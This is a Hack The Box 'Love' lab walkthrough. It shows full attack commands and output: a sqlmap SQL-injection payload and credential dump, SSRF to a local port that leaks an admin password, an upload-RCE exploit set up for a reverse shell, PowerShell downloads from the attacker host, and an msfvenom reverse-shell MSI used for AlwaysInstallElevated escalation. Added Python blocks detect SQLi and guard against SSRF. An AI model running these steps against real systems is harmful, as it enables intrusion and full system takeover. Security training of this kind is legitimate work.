Disclaimer

The hosts attacked in this article are legally authorized. The tools and methods used in this article are only for learning and communication. Please do not use the tools and penetration ideas in this article for any illegal purpose. I am not responsible for any consequences arising from them, nor for any misuse or damage caused.

Service detection

Open port detection

┌──(root💀kali)-[~/HTB/Love]
└─# nmap -p- 10.10.10.239 --open
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-10 08:49 EST
Nmap scan report for 10.10.10.239
Host is up (0.38s latency).
Not shown: 64817 closed tcp ports (reset), 699 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
443/tcp   open  https
445/tcp   open  microsoft-ds
3306/tcp  open  mysql
5000/tcp  open  upnp
5040/tcp  open  unknown
5985/tcp  open  wsman
5986/tcp  open  wsmans
7680/tcp  open  pando-pub
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 188.90 seconds

Port Details

┌──(root💀kali)-[~/HTB/Love]
└─# nmap -sV -Pn -A -O 10.10.10.239 -p 80,135,139,443,445,3306,5000,5040,5985,5986,7680,47001,49664,49665,49666,49667,49668,49669,49670
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-10 08:54 EST
Failed to resolve "80,135,139,443,445,3306,5000,5040,5985,5986,7680,47001,49664,49665,49666,49667,49668,49669,49670".
Stats: 0:00:27 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
Nmap scan report for 10.10.10.239
Host is up (0.40s latency).
Not shown: 992 closed tcp ports (reset)
PORT     STATE SERVICE      VERSION
80/tcp   open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-title: Voting System using PHP
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp  open  ssl/http     Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after:  2022-01-18T14:00:16
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
| tls-alpn:
|_  http/1.1
|_http-title: 403 Forbidden
445/tcp  open  microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open  mysql?
| fingerprint-strings:
|   FourOhFourRequest, NULL, NotesRPC:
|_    Host '10.10.14.5' is not allowed to connect to this MariaDB server
5000/tcp open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Aggressive OS guesses: Microsoft Windows 10 1709 - 1909 (96%), Microsoft Windows Longhorn (95%), Microsoft Windows 10 1709 - 1803 (93%), Microsoft Windows 10 1809 - 1909 (93%), Microsoft Windows 10 1511 (93%), Microsoft Windows 10 1703 (93%), Microsoft Windows Server 2008 R2 (93%), Microsoft Windows Server 2008 SP2 (93%), Microsoft Windows 7 SP1 (93%), Microsoft Windows 8.1 Update 1 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 3h01m34s, deviation: 4h37m10s, median: 21m32s
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2022-01-10T14:17:58
|_  start_date: N/A
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery:
|   OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: Love
|   NetBIOS computer name: LOVE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2022-01-10T06:17:59-08:00

TRACEROUTE (using port 8080/tcp)
HOP RTT       ADDRESS
1   403.34 ms 10.10.14.1
2   403.58 ms 10.10.10.239

Failed to resolve "80,135,139,443,445,3306,5000,5040,5985,5986,7680,47001,49664,49665,49666,49667,49668,49669,49670".
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 147.82 seconds

Web

┌──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -e * -t 100 -u http://10.10.10.239

dirsearch v0.4.2
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492
Output File: /root/dirsearch/reports/10.10.10.239/_22-01-10_08-39-35.txt
Error Log: /root/dirsearch/logs/errors-22-01-10_08-39-35.log
Target: http://10.10.10.239/

[08:39:38] Starting:
[08:40:04] 301 - 337B  - /ADMIN  ->  http://10.10.10.239/ADMIN/
[08:40:04] 301 - 337B  - /Admin  ->  http://10.10.10.239/Admin/
[08:40:14] 301 - 337B  - /admin  ->  http://10.10.10.239/admin/
[08:40:14] 301 - 338B  - /admin.  ->  http://10.10.10.239/admin./
[08:40:15] 200 - 6KB   - /admin/
[08:40:15] 403 - 302B  - /admin/.htaccess
[08:40:15] 200 - 6KB   - /admin%20/
[08:40:16] 302 - 0B    - /admin/login.php  ->  index.php
[08:40:16] 200 - 6KB   - /admin/?/login
[08:40:17] 200 - 6KB   - /admin/index.php
[08:40:17] 302 - 16KB  - /admin/home.php  ->  index.php
[08:40:37] 301 - 348B  - /bower_components  ->  http://10.10.10.239/bower_components/
[08:40:39] 200 - 7KB   - /bower_components/
[08:40:48] 200 - 1KB   - /dist/
[08:40:48] 301 - 336B  - /dist  ->  http://10.10.10.239/dist/
[08:40:57] 302 - 0B    - /home.php  ->  index.php
[08:40:58] 301 - 338B  - /images  ->  http://10.10.10.239/images/
[08:40:58] 200 - 2KB   - /images/
[08:40:58] 503 - 402B  - /examples/
[08:40:59] 200 - 4KB   - /index.php
[08:41:00] 200 - 4KB   - /index.pHp
[08:41:01] 200 - 4KB   - /index.php/login/
[08:41:01] 200 - 4KB   - /index.php.
[08:41:01] 200 - 2KB   - /includes/
[08:41:01] 301 - 340B  - /includes  ->  http://10.10.10.239/includes/
[08:41:05] 302 - 0B    - /login.php  ->  index.php
[08:41:06] 302 - 0B    - /logout.php  ->  index.php
[08:41:20] 301 - 339B  - /plugins  ->  http://10.10.10.239/plugins/
[08:41:20] 200 - 2KB   - /plugins/

Port 80 hosts a web application called Voting System. Search Exploit-DB for known vulnerabilities with searchsploit on Kali:

┌──(root💀kali)-[~/dirsearch]
└─# searchsploit voting system
------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                       |  Path
------------------------------------------------------------------------------------- ---------------------------------
Online Voting System - Authentication Bypass                                         | php/webapps/43967.py
Online Voting System 1.0 - Authentication Bypass (SQLi)                              | php/webapps/50075.txt
Online Voting System 1.0 - Remote Code Execution (Authenticated)                     | php/webapps/50076.txt
Online Voting System 1.0 - SQLi (Authentication Bypass) + Remote Code Execution (RCE) | php/webapps/50088.py
Online Voting System Project in PHP - 'username' Persistent Cross-Site Scripting     | multiple/webapps/49159.txt
Voting System 1.0 - Authentication Bypass (SQLI)                                     | php/webapps/49843.txt
Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution)            | php/webapps/49445.py
Voting System 1.0 - Remote Code Execution (Unauthenticated)                          | php/webapps/49846.txt
Voting System 1.0 - Time-Based SQLI (Unauthenticated SQL injection)                  |
WordPress Plugin Poll_ Survey_ Questionnaire and Voting system 1.5.2 - 'date_answers' Blind SQL Injection | php/webapps/50052.txt
------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

There is an unauthenticated RCE, but it could not be used here. There is also an authenticated RCE, but we have no login credentials yet. There is also SQL injection; if the SQL injection works, we can extract user credentials and then try the authenticated RCE.

Try SQL injection

┌──(root💀kali)-[~/HTB/Love]
└─# sqlmap -r data --batch -p voter --level 5 --risk 3

sqlmap {1.5.12#stable} https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:33:05 /2022-01-10/

[09:33:05] [INFO] parsing HTTP request from 'data'
[09:33:05] [INFO] resuming back-end DBMS 'mysql'
[09:33:05] [INFO] testing connection to the target URL
got a 302 redirect to 'http://10.10.10.239:80/index.php'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: voter (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: voter=admin' AND (SELECT 4771 FROM (SELECT(SLEEP(5)))YdaT) AND 'Vvvd'='Vvvd&password=123&login=asd
---
[09:33:08] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.3.27, Apache 2.4.46
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[09:33:08] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/10.10.10.239'

[*] ending @ 09:33:08 /2022-01-10/

This confirms a time-based blind SQL injection in the voter (username) field.
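The time-based blind injection confirmed above leaves two traces a defender can key on: the SLEEP()/BENCHMARK() call inside the parameter, and a response that takes roughly five seconds longer than the endpoint's normal latency. The Python below is an added example, not part of the original writeup or of sqlmap; it runs that detection logic over constructed request records (client, path, URL-encoded POST body, seconds), assuming the application or a WAF logs POST bodies and that request duration is recorded (for example Apache's %D).

```python
import re
from statistics import median
from urllib.parse import parse_qs

# Constructed sample records, not real logs: (client, path, URL-encoded POST body, seconds).
# Record 3 carries the exact payload sqlmap reported above; record 4 is a slow but benign
# login (say, a database hiccup) so the two signals can be told apart.
SAMPLE = [
    ("10.10.14.9", "/login.php", "voter=alice&password=x&login=Login", 0.21),
    ("10.10.14.9", "/login.php", "voter=bob&password=y&login=Login", 0.19),
    ("10.10.14.2", "/login.php", "voter=carol&password=z&login=Login", 0.23),
    ("10.10.14.5", "/login.php",
     "voter=admin'%20AND%20(SELECT%204771%20FROM%20(SELECT(SLEEP(5)))YdaT)%20AND%20'Vvvd'='Vvvd"
     "&password=123&login=asd", 5.24),
    ("10.10.14.9", "/login.php", "voter=dave&password=w&login=Login", 4.90),
    ("10.10.14.9", "/index.php", "", 0.15),
]

TIME_FUNCS = re.compile(r"(?i)\b(sleep|benchmark)\s*\(")
DELAY_GAP = 4.0   # seconds above the endpoint's median latency treated as an induced delay

def analyse(records):
    """Return one alert dict per suspicious record: which parameters carried a timing
    function ('signature') and how far the response exceeded the endpoint's median ('delay')."""
    durations = {}
    for _, path, _, secs in records:
        durations.setdefault(path, []).append(secs)
    baseline = {path: median(d) for path, d in durations.items()}
    alerts = []
    for i, (client, path, body, secs) in enumerate(records):
        params = parse_qs(body, keep_blank_values=True)   # decodes %20 etc. before matching
        hits = sorted(k for k, vals in params.items()
                      if any(TIME_FUNCS.search(v) for v in vals))
        delay = round(secs - baseline[path], 2)
        if hits or delay >= DELAY_GAP:
            alerts.append({"index": i, "client": client, "path": path,
                           "signature": hits, "delay": delay})
    return alerts

if __name__ == "__main__":
    for alert in analyse(SAMPLE):
        print(alert)
```

A record that trips both signals is a near-certain injection attempt; a delay alone deserves a look at the database, a signature alone means the query was blocked or the function was not reached.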

The following command lists all database names:

sqlmap -r data --batch -p voter --level 3 --risk 3 --dbms=mysql --technique=T --dbs

Output:

available databases [6]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
[*] votesystem


Using the same method and enumerating step by step, the following command dumps the user credentials:

sqlmap -r data --batch -p voter --level 3 --risk 3 --dbms=mysql --technique=T -D votesystem -T admin -C username,password --dump

Database: votesystem
Table: admin
[1 entry]
+----------+--------------------------------------------------------------+
| username | password                                                     |
+----------+--------------------------------------------------------------+
| admin    | $2y$10$psrWULJqgpPOl4HUt.ctM.vFMYJjh65EiRFDbIAZsa3z/F3t/8zXW |
+----------+--------------------------------------------------------------+


But I could not crack the hash with John or Hashcat.

Vhost brute-forcing

echo "10.10.10.239 love.htb" >> /etc/hosts

Use gobuster to brute-force virtual hosts:

┌──(root💀kali)-[~/HTB/Love]
└─# gobuster vhost -u love.htb -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 100
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:          http://love.htb
[+] Method:       GET
[+] Threads:      100
[+] Wordlist:     /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent:   gobuster/3.1.0
[+] Timeout:      10s
===============================================================
2022/01/24 00:57:35 Starting gobuster in VHOST enumeration mode
===============================================================
Found: staging.love.htb (Status: 200) [Size: 5357]

This finds the subdomain staging.love.htb.

Add this name to the hosts file as well; port 80 on it serves a web application called Free File Scanner.

SSRF

The Demo module asks for a URL to scan. I wrote a PHP file locally, started a simple web server with Python, and had the scanner fetch the PHP file: the file was reachable, but the PHP was not executed.

Trying internal access to port 80 (http://127.0.0.1) returns the login page.

Trying internal access to port 443 (http://127.0.0.1:443) returns:

Bad Request

Your browser sent a request that this server could not understand.
Reason: You're speaking plain HTTP to an SSL-enabled server port.
Instead use the HTTPS scheme to access this URL, please.

Trying internal access to port 5000 (http://127.0.0.1:5000) exposes the admin password:

Vote Admin Creds admin: @LoveIsInTheAir!!!!
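The Free File Scanner's Demo fetch is a textbook SSRF: the server follows whatever URL it is given, including http://127.0.0.1:5000, which is only meant to be reachable from the host itself. The Python below is an added example (not code from the original page or from the scanner) of the guard such a fetch-by-URL feature needs: it refuses non-HTTP schemes, embedded credentials and non-standard ports, and rejects any host that resolves to a loopback, private, link-local or otherwise internal address; DNS goes through a pluggable `resolver` so the check can be exercised offline, and the hostnames and addresses used in the test are constructed.

```python
import ipaddress
import socket
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {None, 80, 443}   # 127.0.0.1:5000-style targets are refused before any lookup

def _is_internal(addr):
    """True for loopback, RFC 1918, link-local (cloud metadata), multicast, reserved, unspecified."""
    ip = ipaddress.ip_address(addr)
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped:
        ip = ip.ipv4_mapped            # ::ffff:127.0.0.1 is still loopback
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)

def _dns(host):
    return {info[4][0] for info in socket.getaddrinfo(host, None)}

def check_fetch_url(url, resolver=_dns):
    """Return (ok, reason). resolver(host) -> iterable of IP strings.
    Every address the host resolves to must be public, and the fetcher must then connect
    to one of those exact addresses rather than resolving again (DNS rebinding)."""
    p = urlparse(url)
    if p.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {p.scheme!r} not allowed"
    if p.username is not None or p.password is not None:
        return False, "credentials in URL"
    if not p.hostname:
        return False, "missing host"
    try:
        port = p.port
    except ValueError:
        return False, "bad port"
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed"
    try:
        addrs = {str(ipaddress.ip_address(p.hostname))}   # literal IP, no lookup needed
    except ValueError:
        try:
            addrs = set(resolver(p.hostname))
        except OSError:                                   # socket.gaierror is an OSError
            return False, "unresolvable host"
    if not addrs:
        return False, "unresolvable host"
    bad = sorted(a for a in addrs if _is_internal(a))
    if bad:
        return False, f"resolves to internal address {bad[0]}"
    return True, "ok"
```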

Foothold

Now that we have login credentials, we can use the authenticated RCE to get a shell:

Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution) | php/webapps/49445.py

Edit the settings at the top of the exploit source and adjust the paths:

# -- Edit your settings here ----
IP = "10.10.10.239"                 # Website's URL
USERNAME = "admin"                  # Auth username
PASSWORD = "@LoveIsInTheAir!!!!"    # Auth password
REV_IP = "10.10.14.3"               # Reverse shell IP
REV_PORT = "4242"                   # Reverse port
# --------------------------------
INDEX_PAGE = f"http://{IP}/admin/index.php"
LOGIN_URL = f"http://{IP}/admin/login.php"
VOTE_URL = f"http://{IP}/admin/voters_add.php"
CALL_SHELL = f"http://{IP}/images/shell.php"

After running it, a reverse shell comes back:

┌──(root💀kali)-[~/HTB/Love]
└─# nc -lvnp 785
listening on [any] 785 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.239] 53219
b374k shell : connected

Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\omrs\images>whoami
whoami
love\phoebe

Privilege escalation

Upload winPEAS to the target:

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.3/winPEASx64.exe','c:\Users\Phoebe\Downloads\winPEASx64.exe')"

Registry privilege escalation

Running winPEAS shows that AlwaysInstallElevated is set to 1 in both HKLM and HKCU:

Checking AlwaysInstallElevated
https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated
    AlwaysInstallElevated set to 1 in HKLM!
    AlwaysInstallElevated set to 1 in HKCU!

With both values set, any MSI package this user installs runs with SYSTEM privileges, so we can escalate through the registry setting.

Generate a reverse-shell MSI file:

┌──(root💀kali)-[~/HTB/Love]
└─# msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.14.3 lport=4444 -f msi -o setup.msi
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of msi file: 159744 bytes
Saved as: setup.msi

Upload it to the target:

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.3/setup.msi','c:\Users\Phoebe\Downloads\setup.msi')"

Execute the MSI file:

c:\Users\Phoebe\Downloads>.\setup.msi
.\setup.msi


The reverse shell comes back in the Metasploit handler:

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.3:4444
[*] Sending stage (175174 bytes) to 10.10.10.239
[*] Meterpreter session 1 opened (10.10.14.3:4444 -> 10.10.10.239:53222) at 2022-01-24 02:33:20 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

We now have SYSTEM privileges.